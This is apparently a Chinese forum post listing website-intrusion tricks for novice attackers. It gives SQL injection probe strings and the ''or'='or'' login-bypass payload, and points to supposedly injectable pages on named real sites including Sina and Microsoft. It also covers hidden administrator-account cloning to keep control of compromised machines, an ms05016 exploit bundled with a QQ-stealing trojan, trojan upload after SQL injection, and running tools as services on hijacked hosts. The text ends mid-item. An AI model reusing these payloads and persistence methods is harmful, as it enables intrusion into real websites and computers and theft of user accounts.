常研究网站入侵。再收集一下入侵网站的方法。
大多现在比较少了。但有些仍管用。适合新手,老鸟略过。。
有些也可回味下。。
1.网宽网络有限公司制作的网站基本都有注入漏洞 搜索网宽网络
2.搜索栏里输入
关键字%’and 1=1 and ’%’=’
关键字%’and 1=2 and ’%’=’
比较不同处 可以作为注入的特征字符
3.登陆框用户名和密码输入’or’=’or’ 漏洞很老但是现在很是遍地都是
4.我们先到www.google.com底下搜索一下co net mib ver 1.0
密码帐号都是 ’or’=’or’
5.挂马代码
6.http://www.wyyfk.com/24小时挂qq工具 (这个暂时不能用了)
7.开启regedt32的sam的管理员权限 检查hkey_local_machine\sam\sam\和hkey_local_machine\sam\sam\下的管理员和guest的f键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡,这方法是简单克隆,
net localgroup administrators还是可以看出guest是管理员来
7.只要敢想,新浪也可入侵 注入点
http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=59
微软官方网站注入点
http://www.microsoft.com/library/toolbar/3.0/search.aspx?view=en-us&charset=iso-8859-1&qu=
(这是新浪的ASP程序)
8.ms05016攻击工具用法 mshta.exe test.hta 文件名.后缀名 可以绑上qq大盗木马
9.有sa权限sqlserver数据库、并且能sql注入支持fso+asp的服务器
sql注入后,如何上传木马,
文章地址 http://hack123.home4u.china.com/0601.htm
10.qq强制聊天代码
http://wpa.qq.com/msgrd?v=1&uin=对方的qq号&site=ioshenmue&menu=yes
使用方法:把代码中的红色的“********”星号换成你想与其聊天的qq号后复 制到浏览器的地址栏处即可。无论他是否你的好友,你无须加他为好友就能给 他发qq消息。
11. mybbs论坛cookie欺骗 后台备份马
12.软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂qq等
用法: 安装: instsrv.exe 服务名称 路径
卸载: instsrv.exe 服务名称 remove
13.以动网为例数据库查找dv_log,在上面的查询的字段名里选l_content后面的关键字填上password2,找到的username2=
